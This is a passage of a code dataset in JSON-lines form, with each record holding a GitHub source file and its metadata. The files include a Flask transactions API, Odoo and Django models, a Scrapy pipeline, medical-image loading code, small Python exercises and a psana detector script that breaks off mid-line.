transactions\"\"\"\n response_object =\\\n [user.serialize() for user in TransactionsDBModel.query.all()]\n return response_object, 200\n\n @ns.expect(body_swg)\n @ns.response(201, 'Success', code_20x_swg)\n @ns.response(400, MISSING_VALUES_ERROR, code_400_swg)\n @ns.response(409, 'User already exists', code_409_swg)\n def post(self):\n \"\"\"Create a new transaction\"\"\"\n\n try:\n data = request.get_json()\n missing_args = self.missing_values(data, self.REGISTER_FIELDS)\n if missing_args:\n ns.abort(400, status=MISSING_VALUES_ERROR,\n missing_args=missing_args)\n\n token_deco = UserDBModel.decode_auth_token(data['token'])\n if isinstance(token_deco, str) or data['user_id'] != token_deco:\n ns.abort(404, status=INVALID_TOKEN)\n owner_id = UserProjectDBModel.get_user_of_project_id(\n data['project_id'])\n if owner_id < 0:\n ns.abort(404, status='project not found')\n if owner_id == data['user_id'] and data['type'] == 'support':\n ns.abort(\n 401, status=('An Project Owner cannot support '\n 'his/her own project'))\n if owner_id != data['user_id'] and data['type'] == 'pay':\n ns.abort(\n 401, status='Only Project Owner can make Pay transactions')\n user_model = TransactionsDBModel.add_transaction(\n data['user_id'],\n data['project_id'],\n data['amount'],\n data['type'])\n\n response_object = user_model.serialize()\n return response_object, 201\n except InvalidTransitionAmount:\n ns.abort(403, status='Transaction amount must be bigger than 0')\n except InvalidTransitionType:\n ns.abort(403, status=('Transaction type must '\n 'be either support or pay'))\n except BusinessError as e:\n code, status = self.code_status[e.__class__]\n ns.abort(code, status=status)\n","repo_name":"Seedy-Fiuba-Grupo-5/Backend-users","sub_path":"backend_users/prod/api/transactions_api.py","file_name":"transactions_api.py","file_ext":"py","file_size_in_byte":4128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17785032659","text":"import random\n\n# Datos de Agumon\nagumon = {\"nombre\": \"Agumon\", \"vida\": 100, \"ataque\": 20}\n\n# Datos de Gabumon\ngabumon = {\"nombre\": \"Gabumon\", \"vida\": 100, \"ataque\": 18}\n\n\n# Función para simular un ataque\ndef ataque(atacante, defensor):\n dano = random.randint(15, 25)\n defensor[\"vida\"] -= dano\n if defensor[\"vida\"] < 0:\n defensor[\"vida\"] = 0\n print(\n f\"{atacante['nombre']} infligió {dano} puntos de daño a {defensor['nombre']} (Vida restante: {defensor['vida']}).\"\n )\n\n\n# Simulación del combate\nwhile agumon[\"vida\"] > 0 and gabumon[\"vida\"] > 0:\n # Turno de Agumon\n ataque(agumon, gabumon)\n if gabumon[\"vida\"] <= 0:\n print(\"¡Has derrotado a Gabumon! ¡Eres el vencedor!\")\n break\n\n # Turno de Gabumon\n ataque(gabumon, agumon)\n if agumon[\"vida\"] <= 0:\n print(\"¡Gabumon te ha derrotado! 
¡Has perdido la batalla!\")\n        break\n","repo_name":"KevinPlucci/LABO-1-Python","sub_path":"CLASES/CLASE 1/YO/BattlePets/battlePets_yo.py","file_name":"battlePets_yo.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
{"seq_id":"11619461197","text":"from odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\nimport logging\n\nlogger = logging.getLogger(__name__)\n\nclass BookCategory(models.Model):\n    _name = 'library.book.category'\n\n    _parent_store = True\n    _parent_name = 'parent_id'\n\n    name = fields.Char('Category')\n    book_id = fields.Many2one('library.book', 'Book', required=True)\n    description = fields.Text('Description')\n    parent_id = fields.Many2one('library.book.category',string='Parent Category',ondelete='restrict',index=True)\n    child_ids = fields.One2many('library.book.category','parent_id',string='Child Category')\n    parent_path = fields.Char(index=True)\n\n    @api.constrains('parent_id')\n    def _check_hierarchy(self):\n        if not self._check_recursion():\n            raise models.ValidationError('Error! You cannot create recursive categories.')\n\n    def create_categories(self):\n        categ1 = {'name' : 'Child Category 1','description' : 'Description for child 1'}\n        categ2 = {'name' : 'Child Category 2','description' : 'Description for child 2'}\n        parent_category_val = {\n            'name' : 'Parent Category',\n            'description': 'Description for parent category',\n            'child_ids': [\n                (0,0,categ1),\n                (0,0,categ2)\n            ]\n        }\n        record = self.env['library.book.category'].create(parent_category_val)\n\n    def create_multi_category(self):\n        categ1 = {'name' : 'Category 1','description' : 'Description for Category 1'}\n        categ2 = {'name' : 'Category 2','description' : 'Description for Category 2'}\n\n        multiple_records=self.env['library.book.category'].create([categ1,categ2])\n\n# class LibraryBook(models.Model):\n#     _inherit = \"library.book\"\n\n#     @api.multi\n#     def name_get(self):\n#         result=[]\n#         for book in self:\n#             if not self.env.context.get('custom_search', False):\n#                 authors=book.author_ids.mapped('name')\n#                 name='{} ({})'.format(book.name,', '.join(authors))\n#                 result.append((book.id,name))\n#                 logger.info(\"------------------------Cate Name Get If----------------------------\")\n#             else:\n#                 result.append((book.id,book.name))\n#                 logger.info(\"------------------------Cate Name Get Else----------------------------\")\n#         return result\n\nclass LibraryBook(models.Model):\n    _inherit = 'library.book'\n\n    def name_get(self):\n        logger.info(\"--------------Before Hook-------------------\")\n        # do something before\n        value = super(LibraryBook, self).name_get()\n        # do something after\n        logger.info(\"--------------After Hook-------------------\")\n        logger.info(\"--------------Value Hook------------------- {}\".format(value))\n        return value","repo_name":"PangSoramDepo/Odoo_All_In_One","sub_path":"my_library/models/library_book_categ.py","file_name":"library_book_categ.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"23626453735","text":"import socket\n\nIP='127.0.0.1'\nPORT=12345\n\n\ndef main():\n\t#creating a socket\n\tserverSocket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\tserverSocket.bind((IP,PORT))\n\t#making TCP Socket listen to 10 connections at time\n\tserverSocket.listen(10)\n\n\twhile True:\n\t\t#making socket accept from TCP Connection\n\n\t\tclient,address=serverSocket.accept()\n\t\tprint(f'The Client 
Connected is {address[0]} and on Port No. {address[1]}')\n\t\tbreak\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"manu-karenite/network_lab","sub_path":"01_TCP_Connection/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"11493628539","text":"import json\nfrom argparse import Namespace\n\n\ndef read_args(parser, args_dict):\n    if args_dict is None:\n        args = parser.parse_args()\n    else:\n        default_args_dict = get_argparse_defaults(parser)\n        default_args_dict.update(args_dict)\n        args = Namespace(**default_args_dict)\n\n    # If we are training from a specific hyperparam set:\n    if hasattr(args, 'from_config') and args.from_config:\n        args = update_args_from_config(args)\n    return args\n\n\ndef get_argparse_defaults(parser):\n    \"\"\"Returns the default parameters of an argparser as a dict without the required arguments\n    :type parser: argparse.ArgumentParser\n    \"\"\"\n    defaults = {}\n    for action in parser._actions:\n        if not action.required and action.dest != \"help\":\n            defaults[action.dest] = action.default\n    return defaults\n\n\ndef update_args_from_config(args):\n    \"\"\"If we want to start a training using a specific set of hyperparameters.\n    \"\"\"\n    config = json.load(args.from_config)\n    new_args = dict(vars(args))\n    new_args.update(config[\"args\"])\n    return Namespace(**new_args)\n","repo_name":"adalab-ai/POD_prediction","sub_path":"src/utils/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"33641151735","text":"import string\n\ndef customs():\n    with open('input6.txt') as f:\n\n        file = [group for group in f.read().split('\\n\\n')]\n\n    count = 0\n\n    for line in file:\n        groupPersons = line.split('\\n')\n        allYes = set(string.ascii_lowercase)\n        for person in groupPersons:\n            personYes = set()\n            for char in person:\n                personYes.add(char)\n            allYes = allYes & personYes\n        count += len(allYes)\n    return count\n\nprint(customs())\n","repo_name":"tiitinha/adventofcode","sub_path":"AoC20/day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"3905676383","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom openpyxl import Workbook\nimport os\nimport csv\nfrom pymongo import MongoClient\n\n# class JianshuPipeline(object):\n#     def __init__(self):\n#         self.wb = Workbook()\n#         self.ws = self.wb.active\n#         self.ws.append(['作者', '关注', '粉丝', '文章', '字数', '简书钻', '个人介绍', '作者id', '主页url'])\n#\n#     def process_item(self, item, spider):\n#         line = [item['author'], item['concern'], item['fans'], item['article'], item['word_count'], item['js_diamond'], item['tag'], item['author_uid'], item['author_url']]\n#         self.ws.append(line)\n#         self.wb.save('jianshu.xlsx')\n#         return item\n#\n#     # def __init__(self):\n    #     store_file = os.path.dirname(__file__)+'/spiders/jianshu.csv'\n    #     headers = ['作者', '关注', '粉丝', '文章', '字数', '简书钻', '个人介绍', '作者id', '主页url']\n    #     self.file = open(store_file, 'w', encoding='utf-8')\n    #     self.writer = csv.DictWriter(self.file, headers)\n    #     self.writer.writeheader()\n    #\n    # def process_item(self, item, spider):\n    #     line = [item['author'], item['concern'], item['fans'], 
item['article'], item['word_count'], item['js_diamond'], item['tag'], item['author_uid'], item['author_url']]\n # self.writer.writerows(line)\n # #self.writer.writerows(line)\n # return item\n #\n # def close_spider(self,spider):\n # self.file.close()\n\nMongoDBname = 'jianshu' # 数据库名\nMongoItem = 'num' # 数据库集合名\n\nclass JianshuPipeline(object):\n def __init__(self):\n dbName = MongoDBname # 给数据库添加名字\n client = MongoClient() # 创建连接对象client\n db = client[dbName] # 使用的数据库\n self.post = db[MongoItem]\n\n def process_item(self, item, spider):\n item = dict(item)\n self.post.insert(item)\n return item","repo_name":"StormZO/jianshu","sub_path":"pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19726671973","text":"import os\n\nimport pkg_resources\n\n\ndef activate_egg(eggpath):\n \"\"\"Activate a Scrapy egg file. This is meant to be used from egg runners\n to activate a Scrapy egg file. Don't use it from other code as it may\n leave unwanted side effects.\n \"\"\"\n try:\n d = next(pkg_resources.find_distributions(eggpath))\n except StopIteration:\n raise ValueError(\"Unknown or corrupt egg\")\n d.activate()\n settings_module = d.get_entry_info('scrapy', 'settings').module_name\n os.environ.setdefault('SCRAPY_SETTINGS_MODULE', settings_module)\n","repo_name":"scrapy/scrapyd","sub_path":"scrapyd/eggutils.py","file_name":"eggutils.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":2733,"dataset":"github-code","pt":"37"} +{"seq_id":"15332583938","text":"import json\n\nfrom django.db import migrations\n\n\ndef get_json():\n try:\n with open('recipe/data/tags.json', encoding='utf-8') as file:\n initial_tags = json.load(file)\n return initial_tags\n except FileNotFoundError:\n print('Error')\n\n\ninitial_tags = get_json()\n\n\ndef add_tags(apps, schema_editor):\n Tag = apps.get_model(\"recipe\", \"Tag\")\n for tag in initial_tags:\n new_tag = Tag(**tag)\n new_tag.save()\n\n\ndef remove_tags(apps, schema_editor):\n Tag = apps.get_model(\"recipe\", \"Tag\")\n for tag in initial_tags:\n Tag.objects.get(slug=tag['slug']).delete()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('recipe', '0002_initial'),\n ]\n\n operations = [\n migrations.RunPython(\n add_tags,\n remove_tags\n )\n ]\n","repo_name":"shlenskov/foodgram-project-react","sub_path":"backend/foodgram/recipe/migrations/0003_add_tags.py","file_name":"0003_add_tags.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41074299525","text":"import os.path as osp\nimport numpy as np\nimport gc\nfrom skimage.measure import label, regionprops\n\nfrom ..io.imageio import ImageIO\nfrom .base import AugBase\n\n\nclass LoadPrepare(object):\n \"\"\"\n Not a class inherited from Stage. 
It's used to prepare the format of result.\n \"\"\"\n def __init__(self, debug=False):\n self.debug = debug\n\n def __repr__(self):\n return self.__class__.__name__ + f'(debug={self.debug})'\n\n def __call__(self, image_path, label_path='', **kwargs):\n result = {\n 'filename': osp.basename(image_path),\n 'image_path': image_path,\n 'label_path': label_path,\n 'img_fields': [],\n 'cls_fields': [],\n 'seg_fields': [],\n 'det_fields': [],\n 'history': [],\n 'time': [],\n '_debug_': self.debug\n }\n result.update(kwargs)\n return [result]\n \n\nclass LoadImageFromFile(AugBase):\n def __init__(self, to_float32=True):\n super().__init__()\n self.to_float32 = to_float32\n\n def __repr__(self):\n return self.__class__.__name__ + '(to_float32={})'.format(self.to_float32)\n \n def _forward(self, result):\n image_path = result['image_path']\n \n image, image_dim, image_spacing, image_origin = ImageIO.loadArray(image_path)\n if self.to_float32:\n image = image.astype(np.float32)\n result['img'] = image\n result['img_dim'] = image_dim\n result['img_shape'] = image.shape\n result['img_spacing'] = image_spacing\n result['img_origin'] = image_origin\n result['ori_shape'] = image.shape\n result['ori_spacing'] = image_spacing\n result['img_fields'].append('img')\n gc.collect()\n return result\n\n\nclass LoadAnnotations(AugBase):\n def __init__(self,\n with_cls=False,\n with_seg=False,\n with_det=False):\n super().__init__()\n self.with_cls = with_cls # for classification\n self.with_seg = with_seg # for segmentation\n self.with_det = with_det # for detection\n assert self.with_cls or with_seg or self.with_det\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += '(with_cls={}, with_seg={}, with_det={})'.format(self.with_cls, self.with_seg, self.with_det)\n return repr_str\n \n def _forward(self, result):\n if self.with_cls:\n self._load_cls(result)\n elif self.with_seg:\n self._load_seg(result)\n elif self.with_det:\n self._load_det(result)\n return result\n \n @staticmethod\n def _load_cls(result):\n \"\"\" class is 1 based number\"\"\"\n assert isinstance(result['label_path'], int), 'with label must contain a <int> label'\n result['gt_cls'] = result['label_path']\n result['cls_fields'].append('gt_cls')\n\n @staticmethod\n def _load_seg(result):\n \"\"\" seg is [1, d, h, w] \"\"\"\n label_path = result['label_path']\n assert osp.exists(label_path), 'label path must exist'\n seg, seg_dim, _, _ = ImageIO.loadArray(label_path)\n # assert result['img_dim'] == seg_dim, f\"img is {result['img_dim']}D while label is {seg_dim}D\"\n if np.max(seg) > 64: # it should be a cv image, such as jpg\n # the classes should less than 64\n # if 'ISIC2018' in label_path:\n # seg = (seg > 127.5).astype(np.float32)\n classes = np.unique(seg)\n assert len(classes) < 64, \"there maybe some error ?\"\n for tag, val in enumerate(classes):\n if tag == val:\n continue\n seg[seg == val] = tag\n\n result['gt_seg'] = seg.astype(np.int32)\n result['seg_shape'] = seg.shape\n result['seg_fields'].append('gt_seg')\n gc.collect()\n\n @staticmethod\n def _load_det(result):\n \"\"\" [n, (x,y,x,y, cls, score) | (x,y,z,x,y,z, cls, score)] \"\"\"\n dim = result['img_dim']\n pseudo_mask = np.zeros_like(result['img'][[0], ...])\n\n det = []\n for ann in result['label_path']:\n # ann['bbox']: (x,y,w,h) | (x,y,z,w,h,d)\n # ann['category_id']: int, 1 based\n det.append(ann['bbox'] + [ann['category_id'], 1.00]) # the last one is score\n # draw pseudo mask\n bbox = np.array(ann['bbox']).astype(np.float32)\n bbox[dim:] = bbox[:dim] + 
bbox[dim:]\n slices = list(map(slice, reversed(np.int32(bbox[:dim])), reversed(np.int32(bbox[dim:]))))\n slices = [slice(None)] + slices\n pseudo_mask[tuple(slices)] = ann['category_id']\n\n det = np.array(det).astype(np.float32)\n if len(det) != 0:\n # RoIAlign will contains start and stop elements, but width should not contain\n # for example: 0123456 start is 1, and stop is 4, width = 4 - 1 + 1 = 4\n # _####__\n det[:, dim: 2*dim] = det[:, :dim] + det[:, dim: 2*dim] - 1\n\n result['gt_det'] = det\n result['det_fields'].append('gt_det')\n result['pseudo_mask'] = pseudo_mask\n result['seg_shape'] = pseudo_mask.shape\n result['seg_fields'].append('pseudo_mask')\n\n\nclass LoadCoordinate(AugBase):\n def __repr__(self):\n repr_str = self.__class__.__name__ + '()'\n return repr_str\n\n def _forward(self, result):\n img_shape = result['img'].shape[1:]\n zz, yy, xx = np.meshgrid(\n np.linspace(-0.5, 0.5, img_shape[0]),\n np.linspace(-0.5, 0.5, img_shape[1]),\n np.linspace(-0.5, 0.5, img_shape[2]),\n indexing='ij')\n coord = np.stack([zz, yy, xx], 0).astype('float32')\n\n result['gt_coord'] = coord\n result['seg_fields'].append('gt_coord')\n return result\n\n\nclass LoadPseudoAsSeg(AugBase):\n def __repr__(self):\n repr_str = self.__class__.__name__ + '()'\n return repr_str\n\n def _forward(self, result):\n result['gt_seg'] = result.pop('pseudo_mask')\n result['seg_fields'].remove('pseudo_mask')\n result['seg_fields'].append('gt_seg')\n return result\n\n\nclass LoadSegAsImg(AugBase):\n def __repr__(self):\n repr_str = self.__class__.__name__ + '()'\n return repr_str\n\n def _forward(self, result):\n result['filename'] = osp.basename(result['label_path'])\n result['image_path'] = result['label_path']\n return result\n\n\nclass LoadWeights(AugBase):\n def __repr__(self):\n repr_str = self.__class__.__name__ + '()'\n return repr_str\n\n def _forward(self, result):\n dist, _, _, _ = ImageIO.loadArray(result['weight_path'])\n result['pixel_weight'] = dist\n return result\n\n\nclass LoadPredictions(AugBase):\n def __init__(self,\n with_cls=False,\n with_seg=False,\n with_det=False):\n super().__init__()\n self.with_cls = with_cls # for classification\n self.with_seg = with_seg # for segmentation\n self.with_det = with_det # for detection\n assert self.with_cls or with_seg or self.with_det\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += '(with_cls={}, with_seg={}, with_det={})'.format(self.with_cls, self.with_seg, self.with_det)\n return repr_str\n\n def _forward(self, result):\n if self.with_cls:\n self._load_cls(result)\n elif self.with_seg:\n self._load_seg(result)\n elif self.with_det:\n self._load_det(result)\n return result\n\n @staticmethod\n def _load_cls(result):\n result['pred_cls'] = -1\n result['cls_fields'].append('pred_cls')\n\n @staticmethod\n def _load_seg(result):\n result['pred_seg'] = np.zeros_like(result['img'][[0], ...])\n result['seg_fields'].append('pred_seg')\n\n @staticmethod\n def _load_det(result):\n dim = result['img_dim']\n result['pred_det'] = np.ones([500, 2 * dim + 2]) * -1.\n result['det_fields'].append('pred_det')\n\n\nclass WorldVoxelConversion(AugBase):\n def __init__(self, reverse=False):\n super(WorldVoxelConversion, self).__init__()\n self.reverse = reverse\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += '(reverse={})'.format(self.reverse)\n return repr_str\n\n @staticmethod\n def worldToVoxelCoord(worldCoord, origin, spacing):\n stretchedVoxelCoord = np.absolute(worldCoord - origin)\n voxelCoord = 
stretchedVoxelCoord / spacing\n return voxelCoord\n\n @staticmethod\n def VoxelToWorldCoord(voxelCoord, origin, spacing):\n stretchedVoxelCoord = voxelCoord * spacing\n worldCoord = stretchedVoxelCoord + origin\n return worldCoord\n\n def convert(self, result):\n np.concatenate(\n self.VoxelToWorldCoord(result['gt_det'][:, :3], result['img_spacing'], result['origin']),\n self.VoxelToWorldCoord(result['gt_det'][:, 3:], result['img_spacing'], result['origin']))\n\n def _forward(self, result: dict):\n pass\n # if self.reverse:\n # result['gt_det'] =\n\n\nclass Instance2BBoxConversion(AugBase):\n def __init__(self, instance='gt_seg'):\n super(Instance2BBoxConversion, self).__init__()\n self.always = True\n self.instance_key = instance\n self.reverse = False\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += '(instance_key={}, reverse={})'.format(self.instance_key, self.reverse)\n return repr_str\n\n def _forward(self, result: dict):\n assert self.instance_key in result['seg_fields'], f'{self.instance_key} not in seg_fields{result[\"seg_fields\"]}'\n self._init_params(result)\n\n foreground = result[self.instance_key][0].astype(int)\n labeled, num_obj = label(foreground, return_num=True)\n regions = regionprops(labeled, intensity_image=foreground)\n\n gt_det = []\n for region in regions:\n det = [i.start for i in region.slice][::-1] + [i.stop for i in region.slice][::-1]\n assert int(region.mean_intensity) == region.mean_intensity\n det += [int(region.mean_intensity), 1.0]\n gt_det.append(det)\n result['gt_det'] = np.array(gt_det)\n result['det_fields'].append('gt_det')\n return result\n\n","repo_name":"TimothyZero/MedVision","sub_path":"medvision/aug_cpu/loading.py","file_name":"loading.py","file_ext":"py","file_size_in_byte":10427,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"72203991787","text":"import turtle\nturtle.screensize(600,400,'white')\nturtle.pensize(1)\nturtle.pencolor('blue')\nangle = 0\nd = 1\nwhile angle!=360:\n turtle.seth(angle)\n for i in range(6):\n turtle.fd(d)\n turtle.left(60)\n angle += 12\n d += 2\nturtle.done()","repo_name":"Betristor/Python123","sub_path":"基础语法/turtle_fun2.py","file_name":"turtle_fun2.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38457338407","text":"import time\nimport torch\nimport numpy as np\nfrom importlib import import_module\nimport argparse\nimport utils\nimport train\n\nparser = argparse.ArgumentParser(description='Bruce-Bert-Text-Classification')\nparser.add_argument('--model', type=str, default='Bert', help='choose a model')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n # 数据集地址\n dataset = 'THUCNews'\n model_name = args.model\n x = import_module('models.' 
+ model_name)\n    config = x.Config(dataset)\n    np.random.seed(1)\n    # 保证每次运行结果一致\n    torch.manual_seed(1)\n    torch.cuda.manual_seed_all(1)\n    torch.backends.cudnn.deterministic = True\n\n    start_time = time.time()\n    print('开始加载数据集')\n    train_data, dev_data, test_data = utils.build_dataset(config)\n\n    train_iter = utils.build_iterator(train_data, config)\n    dev_iter = utils.build_iterator(dev_data, config)\n    test_iter = utils.build_iterator(test_data, config)\n\n    time_dif = utils.get_time_dif(start_time)\n    print(\"准备数据的时间:\", time_dif)\n\n    model = x.Model(config).to(config.device)\n    train.train(config, model, train_iter, dev_iter, test_iter)\n","repo_name":"shehuan/Bert-Chinese-Text-Classification-PyTorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"35941222693","text":"from django.urls import path\nfrom .views import CustomerAddressUpdateView,CustomerAddressview, Customeraddressdeleteview, Customeralladdressview, load_states,load_cities\n\n\n\nurlpatterns=[\n    path('customeradddelete/<int:delete>',Customeraddressdeleteview,name='customeraddressdelete'),\n    # path('customeraddupdate/<int:update>',CustomerAddressupdateview,name='customeraddressupdate'),\n    path('customeralladd/',Customeralladdressview,name='customeralladdress'),\n    path('customeradd/',CustomerAddressview,name='customeraddress'),\n    path('ajax/load-states/', load_states, name='ajax_load_states'),\n    path('ajax/load-cities/', load_cities, name='ajax_load_cities'),\n    path('customeraddupdate/<int:pk>',CustomerAddressUpdateView.as_view(),name='customeraddressupdate'),\n\n]\n\n\n","repo_name":"Shubham8184/Ecommerse_Django","sub_path":"EcommerseProject/CustomerProfile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70965463789","text":"# coding: utf-8\n\n\"\"\"\n    Gene Feature Enumeration Service\n\n    The Gene Feature Enumeration (GFE) Submission service provides an API for converting raw sequence data to GFE. It provides both a RESTful API and a simple user interface for converting raw sequence data to GFE results. Sequences can be submitted one at a time or as a fasta file. This service uses <a href=\\"https://github.com/nmdp-bioinformatics/service-feature\\">nmdp-bioinformatics/service-feature</a> for encoding the raw sequence data and <a href=\\"https://github.com/nmdp-bioinformatics/HSA\\">nmdp-bioinformatics/HSA</a> for aligning the raw sequence data. 
The code is open source, and available on <a href=\\\"https://github.com/nmdp-bioinformatics/service-gfe-submission\\\">GitHub</a>.<br><br>Go to <a href=\\\"http://service-gfe-submission.readthedocs.io\\\">service-gfe-submission.readthedocs.io</a> for more information\n\n OpenAPI spec version: 1.0.7\n Contact: mhalagan@nmdp.org\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass Structure(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, accession=None, rank=None, sequence=None, term=None):\n \"\"\"\n Structure - a model defined in Swagger\n\n :param dict swaggerTypes: The key is attribute name\n and the value is attribute type.\n :param dict attributeMap: The key is attribute name\n and the value is json key in definition.\n \"\"\"\n self.swagger_types = {\n 'accession': 'int',\n 'rank': 'int',\n 'sequence': 'str',\n 'term': 'str'\n }\n\n self.attribute_map = {\n 'accession': 'accession',\n 'rank': 'rank',\n 'sequence': 'sequence',\n 'term': 'term'\n }\n\n self._accession = accession\n self._rank = rank\n self._sequence = sequence\n self._term = term\n\n @property\n def accession(self):\n \"\"\"\n Gets the accession of this Structure.\n\n :return: The accession of this Structure.\n :rtype: int\n \"\"\"\n return self._accession\n\n @accession.setter\n def accession(self, accession):\n \"\"\"\n Sets the accession of this Structure.\n\n :param accession: The accession of this Structure.\n :type: int\n \"\"\"\n if accession is None:\n raise ValueError(\"Invalid value for `accession`, must not be `None`\")\n\n self._accession = accession\n\n @property\n def rank(self):\n \"\"\"\n Gets the rank of this Structure.\n\n :return: The rank of this Structure.\n :rtype: int\n \"\"\"\n return self._rank\n\n @rank.setter\n def rank(self, rank):\n \"\"\"\n Sets the rank of this Structure.\n\n :param rank: The rank of this Structure.\n :type: int\n \"\"\"\n if rank is None:\n raise ValueError(\"Invalid value for `rank`, must not be `None`\")\n\n self._rank = rank\n\n @property\n def sequence(self):\n \"\"\"\n Gets the sequence of this Structure.\n\n :return: The sequence of this Structure.\n :rtype: str\n \"\"\"\n return self._sequence\n\n @sequence.setter\n def sequence(self, sequence):\n \"\"\"\n Sets the sequence of this Structure.\n\n :param sequence: The sequence of this Structure.\n :type: str\n \"\"\"\n if sequence is None:\n raise ValueError(\"Invalid value for `sequence`, must not be `None`\")\n\n self._sequence = sequence\n\n @property\n def term(self):\n \"\"\"\n Gets the term of this Structure.\n\n :return: The term of this Structure.\n :rtype: str\n \"\"\"\n return self._term\n\n @term.setter\n def term(self, term):\n \"\"\"\n Sets the term of this Structure.\n\n :param term: The term of this Structure.\n :type: str\n \"\"\"\n if term is None:\n raise ValueError(\"Invalid value for `term`, must not be `None`\")\n\n self._term = term\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], 
item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","repo_name":"nmdp-bioinformatics/service-gfe-submission","sub_path":"client-python/swagger_client/models/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33892836206","text":"import sys\n\n# Modified from cpo example \n# https://github.com/chrisvam/psana_cpo/blob/master/hexanode_save_lcls1.py\n\nif len(sys.argv) == 1:\n print(\"Usage: \")\n print(\"source /reg/g/psdm/etc/psconda.sh\")\n print(\"python cspad_save_lcls1.py exp run detname n_events xtc_dir\")\n print(\"note: use n,m for run n to m, -1 for n_events for all events, leave out xtc_dir if using the experiment folder\")\n print(\"ex: python cspad_save_lcls1.py cxid9114 95,114 CxiDs2.0:Cspad.0 -1 /reg/d/psdm/cxi/cxid9114/demo/xtc\")\n exit()\n \nfrom psana import *\nimport numpy as np\nimport time\nexp = sys.argv[1]\nrun = sys.argv[2]\ndetname = sys.argv[3]\nn_events = int(sys.argv[4])\nxtc_dir = None\nif len(sys.argv) == 6:\n xtc_dir = sys.argv[5]\n\nif run.find(',') > -1:\n run_range = run.split(',')\n run_st, run_en = int(run_range[0]), int(run_range[1])+1\nelse:\n run_st = int(run)\n run_en = run_st + 1\n\nfor run in range(run_st, run_en):\n #hit_ts = np.loadtxt('hits_r%s.txt'%(str(run).zfill(4)), dtype=np.int)\n if xtc_dir:\n dsource = MPIDataSource('exp=%s:run=%s:dir=%s:smd'%(exp, str(run), xtc_dir))\n else:\n dsource = MPIDataSource('exp=%s:run=%s:smd'%(exp, str(run)))\n\n det = Detector(detname)\n epics = dsource.env().epicsStore()\n\n h5fname = \"%s_r%d.h5\"%(exp, run)\n smldata = dsource.small_data(h5fname, gather_interval=1)\n for nevt,evt in enumerate(dsource.events()):\n raw = det.raw(evt)\n if raw is None: continue \n photon_energy = epics.value('SIOC:SYS0:ML00:AO541')\n\n evt_id = evt.get(EventId)\n sec = evt_id.time()[0]\n nsec = evt_id.time()[1]\n timestamp = (sec << 32) | nsec\n \n t = evt_id.time()\n ms = \"%03d\" % (t[1]/1000000)\n tstring = int(time.strftime(\"%Y%m%d%H%M%S\", time.gmtime(t[0])) + ms)\n #found = np.searchsorted(hit_ts, tstring)\n #if hit_ts[found] == tstring:\n print(run, nevt, raw.shape, 